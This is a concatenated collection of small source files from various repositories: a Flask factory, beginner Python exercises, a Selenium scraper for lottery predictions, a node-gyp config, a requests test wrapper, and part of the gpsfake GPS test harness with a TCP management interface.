info@webium.sk
|
4e061c6d7685eaed94cbffea578bff7fb6cf3c09
|
1c8f5e2dbd7ebf9c3b8c1c298004b25e3c883d2a
|
/peptask/__init__.py
|
b3d529aadd7f4ba94e3c9cd40710d79ac210ef9f
|
[] |
no_license
|
pepijnKrijnsen/peptask
|
53066b5f1e5c768eb595c04d5a9376e2d2ef357b
|
55d4f26a89ee7dda481997a948e9f0d3adbd4d74
|
refs/heads/main
| 2023-02-07T07:37:16.422577
| 2020-12-25T21:54:17
| 2020-12-25T21:54:17
| 323,416,950
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 270
|
py
|
import os
from flask import Flask
def create_app():
app = Flask(__name__, instance_relative_config = True)
try:
os.makedirs(app.instance_path)
except OSError:
pass
from . import view
app.register_blueprint(view.bp)
return app
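# A minimal sketch of using the factory during development (assumes the peptask package is importable
# and that the local "view" module defines a blueprint named bp, as imported above):
#     app = create_app()
#     app.run(debug=True)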
|
[
"pepijn@krijnsen.com"
] |
pepijn@krijnsen.com
|
ce8cd7ab7bda889cde62b33efeec107a6221b56b
|
716ec0a6b94d4f593ef06d3217962033628574fa
|
/pytest/ex29.py
|
d31cae23ee22b3e59011e728a36bc07464e5233e
|
[] |
no_license
|
lunabird/MyPythonNote
|
fd1e327ad110257d73e0470ac64b521f85096342
|
248ed5bea9c74cd4ff86537df1d1080a7196c47a
|
refs/heads/master
| 2021-01-10T07:38:40.474217
| 2015-12-15T14:07:28
| 2015-12-15T14:07:28
| 47,493,197
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 471
|
py
|
#-*- coding:utf-8 -*-
people = 20
cats = 30
dogs = 15
if people<cats:
print "Too many cats! The world is doomed!"
if people>cats:
print "Not many cats! The world is saved!"
if people<dogs:
print "The world is drooled on."
if people>dogs:
print "The world is dry."
dogs+=5
if people >= dogs:
print "People are greater than or equal to dogs."
if people <= dogs:
print "People are less than or equal to dogs."
if people == dogs:
print "People are dogs."
|
[
"xd_huangpeng@163.com"
] |
xd_huangpeng@163.com
|
d9a441f1d7dee59f9626ffe6689b3011f88120bc
|
21c5729bb00920a16b8e8fdf6f0d2b472e5187f4
|
/8a.py
|
d196d67f3355b8dc2b2563d5d4a479cf14309199
|
[] |
no_license
|
abhinavdv/Codeforces_accepted_problems
|
b4d854a44070032754b60232249f215eb506e700
|
75f4f9e831613a75a70fa809eb519915248a96a2
|
refs/heads/master
| 2020-07-03T11:32:58.275150
| 2019-08-26T16:22:10
| 2019-08-26T16:22:10
| 201,892,863
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 324
|
py
|
a=input()
b=input()
c=input()
m=0
n=0
if (a.find(b)!= -1 and a.find(c)!= -1):
k=a.index(b)
l=a.index(c)
if k<l:
m=m+1
rev = a[::-1]
o=rev.index(b)
p=rev.index(c)
if o<p:
n=n+1
else:
print("fantasy")
if m!=0 and n==1:
print("both")
elif m==0 and n==1:
print("backward")
elif m!=0 and n==0:
print("forward")
|
[
"dvabhinav31@gmail.com"
] |
dvabhinav31@gmail.com
|
8d4d7d1f3a18b0f2e9716fc6207a59a31bae902a
|
e3d50f9ae8a3b7121b09a578483b7b72e0aa4d16
|
/spider_pk/append_predict/predict_append_rule_100_jump_continue4_base_min.py
|
38998128f4d236cbb06d90eeeb38e7fec43d8ff6
|
[] |
no_license
|
knightsss/xyft
|
e17257a9d4736232714097f2adddae3ea4edef3a
|
916fb3a99db3d6a65dbba2b6e72c78142b8ca2b2
|
refs/heads/master
| 2020-06-28T10:16:08.851545
| 2019-08-02T09:33:15
| 2019-08-02T09:33:15
| 200,207,521
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,420
|
py
|
#coding=utf-8
__author__ = 'shifeixiang'
import time
from selenium import webdriver
from bs4 import BeautifulSoup
from append_predict.models import KillPredict
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from pkten_log.pk_log import PkLog
pk_logger = PkLog('append_predict.predict_append_rule_100').log()
#get a Selenium driver for the prediction page
def spider_predict_selenium():
driver_flag = True
while(driver_flag):
driver = webdriver.Firefox(executable_path = './pkten_log/geckodriver.exe')
driver.get("https://www.1399p.com/pk10/shdd")
try:
element = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CLASS_NAME , "lotteryNumber")))
driver_flag = False
return driver
except:
print "get driver time out"
driver.quit()
time.sleep(10)
#fetch the soup list for the 10 ranking positions
def get_soup_list(interval):
count = 0
flag = True
while(flag):
try:
soup_list = []
driver = interval["driver"]
driver.get("https://www.1399p.com/pk10/shdd")
try:
element = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CLASS_NAME , "lotteryNumber")))
time.sleep(1)
#driver.maximize_window();
# driver.manage().window().maximize();
time.sleep(1)
js = "var q=document.documentElement.scrollTop=300"
driver.execute_script(js)
#print "scroll finish!"
pk_logger.info("scroll finish!")
                #handle 100 draws
#print 'click select'
pk_logger.info("click select")
driver.find_element_by_class_name('colorWorld_selectJtou').click()
time.sleep(1)
#print 'click 10'
#driver.find_element_by_xpath('/html/body/div[3]/div[2]/div/div/div[1]/div/div/div/div/span[1]').click()
#print 'click 100'
pk_logger.info("click 100")
driver.find_element_by_xpath('/html/body/div[3]/div[2]/div/div/div[1]/div/div/div/div/span[4]').click()
time.sleep(2)
                #selection handled
for i in range(10):
'/html/body/div[3]/div[2]/div/div/div[2]/div[2]/span[1]/span'
driver.find_element_by_xpath('/html/body/div[3]/div[2]/div/div/div[2]/div[2]/span[' + str(i+1) + ']/span').click()
time.sleep(4)
soup = BeautifulSoup(driver.page_source)
soup_list.append(soup)
return soup_list
except:
pk_logger.error("get sub driver time out")
#print "get sub driver time out"
driver.quit()
pk_logger.error("spider predict faild!")
#print "spider predict faild!"
time.sleep(3)
interval["driver"] = spider_predict_selenium()
if count > 2:
flag = False
except:
driver.quit()
#print "spider predict faild!"
pk_logger.error("spider predict faild!")
time.sleep(3)
interval["driver"] = spider_predict_selenium()
if count > 2:
flag = False
count = count + 1
return []
#from one ranking's soup, extract the predicted numbers, the kill-rate list and the draw id
def get_kill_purchase_list(soup):
count = 1
percent_list = []
number_list = []
number_str_all_list = []
prev_number_list = []
hit_number = 0
#每个名次命中率列表
continue_hit_list = []
all_continue_hit_number = 0
for tr in soup.find(class_='lotteryPublic_tableBlock').find_all('tr'):
        #percentages
if count == 1:
p_percent = 0
current_percent_all = 30
for td in tr.find_all(class_='font_red'):
if p_percent < 10:
value = float(str(td.string).strip().replace("%",""))
percent_list.append(value)
if p_percent == 10:
current_percent_all = float(str(td.string).strip().replace("%",""))
p_percent = p_percent + 1
        #current consecutive-hit counts
if count == 2:
p_continue_hit = 0
for td in tr.find_all(class_='font_blue0f'):
                #the first 10 values are the consecutive-hit counts of the 10 rankings
if p_continue_hit < 10:
value = int(str(td.string))
#pk_logger.info("continue hit number:%d", value)
continue_hit_list.append(value)
                #total consecutive-hit count
if p_continue_hit == 10:
all_continue_hit_number = int(str(td.string))
#pk_logger.info("all continue hit number:%d", all_continue_hit_number)
p_continue_hit = p_continue_hit + 1
if count == 5:
p_number = 0
for td in tr.find_all('td'):
if p_number == 0:
protty_id = td.string
if p_number > 1 and p_number < 12:
value = int(td.string)
number_list.append(value)
number_str_all_list.append(str(value))
p_number = p_number + 1
        #previous draw
if count == 6:
p_number = 0
for td in tr.find_all('td'):
if p_number == 0:
pre_protty_id = td.string
if p_number == 1:
hit_number = td.string
if p_number > 1 and p_number < 12:
value = int(td.string)
prev_number_list.append(str(value))
p_number = p_number + 1
count = count + 1
    #compute regardless of whether every number was killed correctly
#kill_flag = True
    #used to decide whether the all-killed filter passes
kill_all_flag = False
#print "number_list:",number_list
pk_logger.info("number_list: %s" , number_list)
#print "last hit_number is:",hit_number,' ',prev_number_list
    #not all numbers were killed
if hit_number in prev_number_list:
kill_all_flag = False
    #all numbers were killed
else:
kill_all_flag = True
return protty_id,percent_list,number_list,number_str_all_list,kill_all_flag,current_percent_all,all_continue_hit_number
#from one ranking's soup, get the predicted kill-rate list, the overall kill rate and the total consecutive hits
def get_min_current_percent_all_and_continue_hit(soup):
count = 1
continue_hit_list = []
all_continue_hit_number = 0
for tr in soup.find(class_='lotteryPublic_tableBlock').find_all('tr'):
if count == 1:
p_percent = 0
for td in tr.find_all(class_='font_red'):
if p_percent == 10:
current_percent_all = float(str(td.string).strip().replace("%",""))
p_percent = p_percent + 1
#print "current_percent_all:",current_percent_all
        #current consecutive-hit counts
if count == 2:
p_continue_hit = 0
for td in tr.find_all(class_='font_blue0f'):
                #the first 10 values are the consecutive-hit counts of the 10 rankings
if p_continue_hit < 10:
value = int(str(td.string))
#pk_logger.info("continue hit number:%d", value)
continue_hit_list.append(value)
                #total consecutive-hit count
if p_continue_hit == 10:
all_continue_hit_number = int(str(td.string))
#pk_logger.info("all continue hit number:%d", all_continue_hit_number)
p_continue_hit = p_continue_hit + 1
count = count + 1
return current_percent_all,all_continue_hit_number
#number handling: the top-6 ranked numbers are filtered out and the remaining numbers are bought
def max_min_deal(percent_list,number_list, kill_list, purchase_list, current_percent_all):
if current_percent_all < 50:
last_number = list(set(number_list))
# elif current_percent_all>= 40:
# #杀掉号码,取前6名作为杀号码
# for i in range(10):
# max_percent = max(percent_list)
# index = percent_list.index(max_percent)
# percent_list.remove(max_percent)
# number_value = number_list.pop(index)
# kill_list.append(number_value)
# #预留号码
# for i in range(10):
# purchase_list.append(int(i+1))
# last_number = list(set(purchase_list) - set(kill_list))
else:
last_number = []
number_str = ''
if len(last_number)>0:
count = 0
for number in last_number:
if count == len(last_number)-1:
number_str = number_str + str(number)
else:
number_str = number_str + str(number) + '|'
count = count + 1
return number_str
else:
return '0'
#get the list of numbers to buy, one sub-list per ranking
def get_purchase_list(interval, last_purchase_hit, xiazhu_nums):
soup_list = get_soup_list(interval)
purchase_number_list = ''
purchase_number_list_desc = ''
predict_number_all_list = []
protty_id = 0
count = 0
page_count_index = 1
purchase_mingci_number = 1
    #find the minimum overall percentage
current_percent_all_min = 50
current_percent_all_list = []
current_all_continue_hit_max = 0
current_all_continue_hit_list = []
for soup in soup_list:
        #get the overall percentage and the total consecutive hits
current_percent_all,all_continue_hit_number = get_min_current_percent_all_and_continue_hit(soup)
current_percent_all_list.append(current_percent_all)
current_all_continue_hit_list.append(all_continue_hit_number)
pk_logger.info("current_percent_all: %s" , current_percent_all)
pk_logger.info("all_continue_hit_number: %s" , all_continue_hit_number)
        #track the minimum hit rate
if current_percent_all_min > current_percent_all:
current_percent_all_min = current_percent_all
        #track the maximum consecutive-hit count
if current_all_continue_hit_max < all_continue_hit_number:
current_all_continue_hit_max = all_continue_hit_number
current_percent_all_min = sorted(current_percent_all_list)[0]
current_percent_all_second_min = sorted(current_percent_all_list)[1]
pk_logger.info("current_percent_all_min: %s" , current_percent_all_min)
pk_logger.info("current_percent_all_second_min: %s" , current_percent_all_second_min)
    #if the lowest and second-lowest differ by 8 or more, use the second-lowest as the minimum
if current_percent_all_second_min - current_percent_all_min >= 8:
current_percent_all_min = current_percent_all_second_min
current_percent_all_list_str = str(current_percent_all_list)
#print "current_percent_all_min:",current_percent_all_min
pk_logger.info("current_percent_all_min: %s" , current_percent_all_min)
pk_logger.info("current_all_continue_hit_max: %s" , current_all_continue_hit_max)
    #iterate over the rankings and pick out the ones that meet the conditions
for soup in soup_list:
protty_id, percent_list,number_list,number_str_all_list,kill_all_flag,current_percent_all,all_continue_hit_number = get_kill_purchase_list(soup)
current_number_all = "|".join(number_str_all_list)
predict_number_all_list.append(current_number_all)
kill_list = []
purchase_list = []
        #if some ranking has 3 or more consecutive hits, jump to it
if current_all_continue_hit_max > 3 :
if all_continue_hit_number == current_all_continue_hit_max:
pk_logger.info("jump to continue hit:%d",current_all_continue_hit_max)
purchase_number = max_min_deal(percent_list, number_list, kill_list, purchase_list, current_percent_all)
purchase_mingci_number = page_count_index
                #avoid buying several times when rankings share the maximum run
current_all_continue_hit_max = current_all_continue_hit_max + 1
else:
purchase_number = '0'
        #case: no 4-draw consecutive-hit run
else:
            #case: the previous draw was a hit
if (last_purchase_hit):
                #buy on the ranking with the minimum rate
if current_percent_all == current_percent_all_min:
                    #buy on both the minimum and second minimum (alternative, see commented line below)
#if current_percent_all <= current_percent_all_second_min:
#print "last hit"
pk_logger.info("last hit")
purchase_number = max_min_deal(percent_list, number_list, kill_list, purchase_list, current_percent_all)
purchase_mingci_number = page_count_index
                    #avoid buying several times when rankings share the minimum
current_percent_all_min = 0
else:
purchase_number = '0'
            #case: the previous draw was a miss
else:
                #keep using the same missed ranking (alternative, see commented line below)
#if xiazhu_nums == page_count_index:
                #take the ranking with the minimum rate
if current_percent_all == current_percent_all_min:
                    #buy on both the minimum and second minimum (alternative, see commented line below)
#if current_percent_all <= current_percent_all_second_min:
#print "last not hit"
pk_logger.info("last not hit")
purchase_number = max_min_deal(percent_list, number_list, kill_list, purchase_list, current_percent_all)
purchase_mingci_number = page_count_index
                    #avoid buying several times when rankings share the minimum
current_percent_all_min = 0
else:
purchase_number = '0'
if count == len(soup_list) - 1:
purchase_number_list = purchase_number_list + str(purchase_number)
purchase_number_list_desc = purchase_number_list_desc + '[' + str(purchase_number) + ']'
else:
purchase_number_list = purchase_number_list + str(purchase_number) + ','
purchase_number_list_desc = purchase_number_list_desc + '[' + str(purchase_number) + ']---,'
count = count + 1
page_count_index = page_count_index + 1
predict_number_all_list_str = ",".join(predict_number_all_list)
return protty_id, purchase_number_list, purchase_number_list_desc, predict_number_all_list_str, current_percent_all_list_str, purchase_mingci_number
def get_last_number_predict_kill_result(protty_id,index):
last_protty_id = int(protty_id) - 1
try:
p = KillPredict.objects.get(lottery_id=last_protty_id)
number_all_list = p.predict_number_all.split(',')[index]
number_hit = str(int(p.lottery_number.split(',')[index]))
#print "number_hit,number_all_list ",number_hit,number_all_list
pk_logger.info("number_hit:%s", number_hit)
pk_logger.info("number_all_list:%s", number_all_list)
if number_hit in number_all_list:
# print "no kill all"
return False
else:
# print "kill all"
return True
except:
#print "kill error"
pk_logger.info("kill error")
return False
|
[
"shifeixiang@37.com"
] |
shifeixiang@37.com
|
cf7db30b318d32e7d7706d2e98d223adbaa4159a
|
4ee14633e17169d1775967e84331ba4bfd52ea2c
|
/my-yapi/vendors/node_modules/dtrace-provider/src/build/config.gypi
|
abee38e00bbbaa66cb38ac16a131c73a62bccce0
|
[
"Apache-2.0",
"BSD-2-Clause"
] |
permissive
|
iQuanhe/ice-ts
|
cd848e4684a6afef4a231ff6b8c3e71d4c8126ee
|
0ed5240d29e4da5914a3761ea02a908c4644cdd2
|
refs/heads/master
| 2023-01-29T05:07:32.978636
| 2020-09-07T07:30:27
| 2020-09-07T07:30:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,476
|
gypi
|
# Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"build_v8_with_gn": "false",
"coverage": "false",
"debug_nghttp2": "false",
"enable_lto": "false",
"force_dynamic_crt": 0,
"host_arch": "x64",
"icu_data_in": "../../deps/icu-small/source/data/in/icudt62l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps/icu-small",
"icu_small": "true",
"icu_ver_major": "62",
"llvm_version": "0",
"node_byteorder": "little",
"node_debug_lib": "false",
"node_enable_d8": "false",
"node_enable_v8_vtunejit": "false",
"node_install_npm": "true",
"node_module_version": 64,
"node_no_browser_globals": "false",
"node_prefix": "/",
"node_release_urlbase": "https://nodejs.org/download/release/",
"node_shared": "false",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_nghttp2": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_target_type": "executable",
"node_use_bundled_v8": "true",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_openssl": "true",
"node_use_pch": "false",
"node_use_perfctr": "false",
"node_use_v8_platform": "true",
"node_with_ltcg": "false",
"node_without_node_options": "false",
"openssl_fips": "",
"openssl_no_asm": 0,
"shlib_suffix": "64.dylib",
"target_arch": "x64",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_enable_inspector": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_promise_internal_field_count": 1,
"v8_random_seed": 0,
"v8_trace_maps": 0,
"v8_typed_array_max_size_in_heap": 0,
"v8_use_snapshot": "true",
"want_separate_host_toolset": 0,
"xcode_version": "7.0",
"nodedir": "/Users/luyan1/.node-gyp/10.10.0",
"standalone_static_library": 1,
"dry_run": "",
"save_dev": "",
"legacy_bundling": "",
"only": "",
"viewer": "man",
"browser": "",
"commit_hooks": "true",
"also": "",
"rollback": "true",
"sign_git_commit": "",
"audit": "true",
"usage": "",
"globalignorefile": "/Users/luyan1/.nvm/versions/node/v10.10.0/etc/npmignore",
"shell": "/bin/bash",
"maxsockets": "50",
"init_author_url": "",
"metrics_registry": "https://registry.npm.taobao.org/",
"parseable": "",
"shrinkwrap": "true",
"timing": "",
"init_license": "ISC",
"if_present": "",
"init_author_email": "",
"sign_git_tag": "",
"cache_max": "Infinity",
"cert": "",
"local_address": "",
"long": "",
"git_tag_version": "true",
"preid": "",
"fetch_retries": "2",
"noproxy": "",
"registry": "https://registry.npm.taobao.org/",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/Users/luyan1/.nvm/versions/node/v10.10.0/etc/npmrc",
"prefer_online": "",
"always_auth": "",
"logs_max": "10",
"cache_lock_retries": "10",
"global_style": "",
"update_notifier": "true",
"heading": "npm",
"audit_level": "low",
"offline": "",
"searchlimit": "20",
"read_only": "",
"fetch_retry_mintimeout": "10000",
"json": "",
"access": "",
"allow_same_version": "",
"engine_strict": "",
"description": "true",
"https_proxy": "",
"userconfig": "/Users/luyan1/.npmrc",
"init_module": "/Users/luyan1/.npm-init.js",
"cidr": "",
"user": "501",
"node_version": "10.10.0",
"save": "true",
"editor": "vi",
"ignore_prepublish": "",
"auth_type": "legacy",
"tag": "latest",
"script_shell": "",
"global": "",
"progress": "true",
"searchstaleness": "900",
"ham_it_up": "",
"optional": "true",
"save_prod": "",
"bin_links": "true",
"force": "",
"searchopts": "",
"depth": "Infinity",
"node_gyp": "/Users/luyan1/.nvm/versions/node/v10.10.0/lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js",
"sso_poll_frequency": "500",
"rebuild_bundle": "true",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"strict_ssl": "true",
"ca": "",
"tag_version_prefix": "v",
"scripts_prepend_node_path": "warn-only",
"sso_type": "oauth",
"save_prefix": "^",
"dev": "",
"group": "20",
"save_exact": "",
"fetch_retry_factor": "10",
"prefer_offline": "",
"cache_lock_stale": "60000",
"version": "",
"otp": "",
"cache_min": "10",
"cache": "/Users/luyan1/.npm",
"searchexclude": "",
"color": "true",
"package_lock": "true",
"package_lock_only": "",
"save_optional": "",
"ignore_scripts": "",
"user_agent": "npm/6.4.1 node/v10.10.0 darwin x64",
"cache_lock_wait": "10000",
"production": "true",
"save_bundle": "",
"send_metrics": "",
"umask": "0022",
"node_options": "",
"init_version": "1.0.0",
"git": "git",
"scope": "",
"init_author_name": "",
"tmp": "/var/folders/yb/wrtmydss1j5gyj6h33z71nl40000gn/T",
"onload_script": "",
"unsafe_perm": "true",
"link": "",
"prefix": "/Users/luyan1/.nvm/versions/node/v10.10.0"
}
}
|
[
"luyan1@staff.weibo.com"
] |
luyan1@staff.weibo.com
|
0072ba9cedb27f7e03c1dc9b59e97765a1279d1b
|
17fd2fc45800b9bdec008ec235749263cd7412f5
|
/common/base_api.py
|
8f75a60ff280208d7e025d8144c7f1bb804f649b
|
[] |
no_license
|
luffy000000/excelddtdriver
|
78395bd74fc0ef178e9c0527371b1f72cb95ac99
|
c891678aea0983b048779ccccd51b7d288b9bd8f
|
refs/heads/master
| 2020-05-07T19:14:16.355383
| 2019-04-11T14:16:39
| 2019-04-11T14:28:55
| 180,804,253
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,774
|
py
|
from common.writeexcel import Write_excel
import json
def send_requests(s, testdata):
    # wrap the requests call
method = testdata["method"]
url = testdata["url"]
# url后面的params参数
try:
params = eval(testdata["params"])
except:
params = None
    # request headers
try:
headers = eval(testdata["headers"])
print("请求头部: %s" % headers)
except:
headers = None
    # body type for a POST request
type = testdata["type"]
test_num = testdata['id']
print("******正在执行用例: ------ %s ------******" % test_num)
print("请求方式: %s, 请求url: %s" % (method, url))
print("请求params: %s" % params)
    # body content for a POST request
try:
bodydata = eval(testdata["body"])
except:
bodydata = {}
    # decide whether to send the body as form data or as json
if type == "data":
body = bodydata
elif type == "json":
body = json.dumps(bodydata)
else:
body = bodydata
if method == "post":
print("post请求body类型为: %s, body内容为: %s" % (type, body))
verify = False
    res = {}  # holds the response data
try:
r = s.request(method=method,
url=url,
params=params,
headers=headers,
data=body,
verify=verify
)
print("页面返回信息: %s" % r.content.decode("utf-8"))
res['id'] = testdata['id']
res['rowNum'] = testdata['rowNum']
res["statuscode"] = str(r.status_code) # 状态码转成str
res["text"] = r.content.decode("utf-8")
res["times"] = str(r.elapsed.total_seconds()) # 接口请求时间转换成str
if res["statuscode"] != "200":
res["error"] = res["text"]
else:
res["error"] = ""
res["msg"] = ""
if testdata["checkpoint"] in res["text"]:
res["result"] = "pass"
print("用例测试结果: %s---->%s" % (test_num, res["result"]))
else:
res["result"] = "fail"
return res
except Exception as msg:
res["msg"] = str(msg)
return res
def write_result(result, filename="result.xlsx"):
    # row number of this result in the sheet
    row_num = result['rowNum']
    # write the results back to the workbook
    wt = Write_excel(filename)
    wt.write(row_num, 8, result['statuscode']) # returned status code, column 8
    wt.write(row_num, 9, result['times']) # elapsed time
    wt.write(row_num, 10, result['error']) # response body when the status code is not 200
    wt.write(row_num, 12, result['result']) # test result: pass or fail
    wt.write(row_num, 13, result['msg']) # exception message, if any
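# A minimal sketch of driving send_requests/write_result by hand; the key names mirror the fields
# read above, while the url and checkpoint values are purely hypothetical:
#     import requests
#     s = requests.session()
#     testdata = {
#         "id": "case_001", "rowNum": 2, "method": "get",
#         "url": "https://httpbin.org/get", "params": "{'q': '1'}",
#         "headers": "{'Accept': 'application/json'}",
#         "type": "data", "body": "{}", "checkpoint": "args",
#     }
#     result = send_requests(s, testdata)
#     write_result(result, "result.xlsx")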
|
[
"luffy000000@126.com"
] |
luffy000000@126.com
|
91a3ba73412a6987c81b0bd4f2238ff1b57396a4
|
5ec89657143f814423e5488dbda04b58cca2e3fd
|
/tartangan/kubeflow/download_dataset.py
|
73c3d94bbd2e3a44082c804f262463932130f875
|
[
"MIT"
] |
permissive
|
awentzonline/tartangan
|
c9f17e20e63c00eb2f5c30d6fdc3781e3b3ae600
|
2d36a81fa0ae91fe6b9b4e1f26763285630837fb
|
refs/heads/master
| 2023-07-20T05:48:16.762483
| 2020-11-08T09:30:09
| 2020-11-08T09:30:52
| 229,628,075
| 0
| 0
|
MIT
| 2023-07-06T21:36:22
| 2019-12-22T20:39:59
|
Python
|
UTF-8
|
Python
| false
| false
| 831
|
py
|
import smart_open
from .base_metadata_app import BaseMetadataApp
class DownloadDatasetMetadata(BaseMetadataApp):
def run(self):
super().run()
datasets = self.find_metadata_datasets_by_name(self.args.dataset_name)
# TODO: need to sort to get latest?
dataset = datasets[-1]
with smart_open.open(dataset['uri'], 'rb') as infile:
with smart_open.open(self.args.output_path, 'wb') as outfile:
outfile.write(infile.read())
@classmethod
def add_args_to_parser(cls, p):
super().add_args_to_parser(p)
p.add_argument('dataset_name', help='Name of metadata entity')
p.add_argument('output_path', help='Where the corresponding files go')
def main():
DownloadDatasetMetadata.run_from_cli()
if __name__ == '__main__':
main()
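# Hypothetical invocation (run_from_cli and the metadata-store configuration come from BaseMetadataApp;
# the dataset name and output path below are placeholders):
#     python -m tartangan.kubeflow.download_dataset my-dataset ./dataset.tar.gz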
|
[
"adam@vody.com"
] |
adam@vody.com
|
baf5a5f484dba86ab66d7b9c8dcff33a2118f523
|
a853fae5335d3f943e83b3cb7a9baaa64cb9ed42
|
/9. Servo Motor/servo_2.py
|
bfc0b13241864883fd06510be582e05ad59dbddd
|
[] |
no_license
|
SharjeelBaig0508/Internet-of-Things
|
8b6739a6337b1f1275d479da38e58e3ab79fc63c
|
70b06565f452a3d9e1f127d69a72c7b8c202a666
|
refs/heads/main
| 2023-06-14T06:51:46.249823
| 2021-07-12T20:31:18
| 2021-07-12T20:31:18
| 385,369,448
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 405
|
py
|
import RPi.GPIO as GPIO
from time import sleep
slow=0.01
GPIO.setmode(GPIO.BOARD)
GPIO.setup(3, GPIO.OUT)
pwm=GPIO.PWM(3, 50)
pwm.start(0)
pwm.ChangeDutyCycle(2)
try:
    while 1:
        # sweep from 0 to 180 degrees
        for x in range(0, 180):
            y=1./18.*(x)+2
            pwm.ChangeDutyCycle(y)
            sleep(slow)
        # sweep back from 180 to 0 degrees
        for x in range(180, 0, -1):
            y=1./18.*(x)+2
            pwm.ChangeDutyCycle(y)
            sleep(slow)
except KeyboardInterrupt:
    # the cleanup below was unreachable after the infinite loop; run it on Ctrl-C instead
    pass
pwm.stop()
GPIO.cleanup()
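# The sweep maps angle x to duty cycle y = x/18 + 2, so 0 deg -> 2%, 90 deg -> 7%, 180 deg -> 12%.
# At the 50 Hz PWM frequency used here that corresponds to pulse widths of roughly 0.4 ms to 2.4 ms.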
|
[
"noreply@github.com"
] |
SharjeelBaig0508.noreply@github.com
|
6b3aebc3cccb73e61b938e010c8db365d463fd19
|
78aaf4ddbb126cf5ef78ed6c9485597c96282f7b
|
/gpsfake
|
145c7bccb0d82f9bb8a1d2636b2987e8b8989fbb
|
[
"ISC",
"LicenseRef-scancode-ibm-dhcp",
"BSD-3-Clause"
] |
permissive
|
szzso/GPSD-with-management
|
cbe1766c0b96ca4cef17cedd0d68ba3f1ebb0409
|
9bfab35044861290c271ff559addebe022b26269
|
refs/heads/master
| 2021-01-21T15:13:27.318281
| 2018-04-17T18:45:31
| 2018-04-17T18:45:31
| 91,834,565
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,683
|
#!/usr/bin/env python2
#
# gpsfake -- test harness for gpsd
#
# Simulates one or more GPSes, playing back logfiles.
# Most of the logic for this now lives in gps.fake,
# factored out so we can write other test programs with it.
#
# This file is Copyright (c) 2010 by the GPSD project
# BSD terms apply: see the file COPYING in the distribution root for details.
import getopt
import gps
import gps.fake as gpsfake # The "as" pacifies pychecker
import os
import platform
import pty
import time
import socket
import sys
import Queue
from tempfile import NamedTemporaryFile
from threading import Thread
from random import randint
class TCPThread(Thread):
def __init__(self, queue, managementport):
''' Constructor. '''
Thread.__init__(self)
self.queue = queue
self.running = True
self.daemon = True
self.port = managementport
# Function for handling connections. This will be used to create threads
def clientthread(self, conn):
# Sending message to connected client
conn.send('Welcome to the Gpsfake management interface.\n') # send only takes string
file = False
manual = False
self.tmp = ""
        # infinite loop so that the function does not terminate and the thread does not end.
while self.running:
# Receiving from client
try:
data = conn.recv(1024)
if "file-begin" in data:
print "File comming"
file = True
f = NamedTemporaryFile(delete=False)
                    data = data.replace('file-begin', '')
f.write(data)
continue
elif "file-end" in data:
print "File arrived"
file = False
conn.sendall("OK... file recived")
path = f.name
data = data.replace('file-end', '')
f.write(data)
f.close()
self.queue.put("file," + path)
                    reply = 'OK...file received'
conn.sendall(reply)
continue
elif "manual-begin" in data:
print "Manual begin"
manual = True
data = data.replace('manual-begin', '')
self.queue.put("manual-begin")
path = 'manualTrack.nmea'
self.f = open(path, 'wt')
                    data = data.replace('file-begin', '')
self.readNMEA(data, self.tmp)
elif "manual-end" in data:
print "Manual-end"
manual = False
data = data.replace('manual-end', '')
self.readNMEA(data, self.tmp)
self.f.close()
self.queue.put("manual-end")
elif file:
f.write(data)
elif manual:
self.readNMEA(data, self.tmp)
elif data:
self.queue.put(data)
reply = 'OK...' + data
conn.sendall(reply)
#print 'From client ' + data
elif not data:
print "No data: " + data
break
except socket.error as ex:
if str(ex) == "[Errno 35] Resource temporarily unavailable":
time.sleep(0)
continue
raise ex
# came out of loop
print 'Close listening'
def readNMEA(self, data, tmp):
if tmp != "":
data = tmp + data
tmp = ""
if "$" in data:
# print "Data: " + data
            sentence = data.split('\n')
for i in sentence:
#print i
self.f.write(i)
if not "*" in i:
tmp += i
print "tmp: "+ tmp
else:
self.queue.put(i)
def run(self):
HOST = '' # Symbolic name meaning all available interfaces
#PORT = 8888
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print 'Socket created'
# Bind socket to local host and port
try:
soc.bind((HOST, self.port))
except socket.error as msg:
print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
print 'Socket bind complete'
# Start listening on socket
soc.listen(1)
print 'Socket now listening'
# now keep talking with the client
while self.running:
try:
# wait to accept a connection - blocking call
conn, addr = soc.accept()
print 'Connected with ' + addr[0] + ':' + str(addr[1])
self.clientthread(conn)
except socket.error as msg:
if msg[0] == 104:
print "Disconnected client: " + addr[0] + ':' + str(addr[1])
else:
print msg
finally:
conn.close()
conn.close()
print 'Close thread'
class Baton:
"Ship progress indications to stderr."
# By setting this > 1 we reduce the frequency of the twirl
# and speed up test runs. Should be relatively prime to the
    # number of baton states, otherwise it will cause beat artifacts
# in the twirling.
SPINNER_INTERVAL = 11
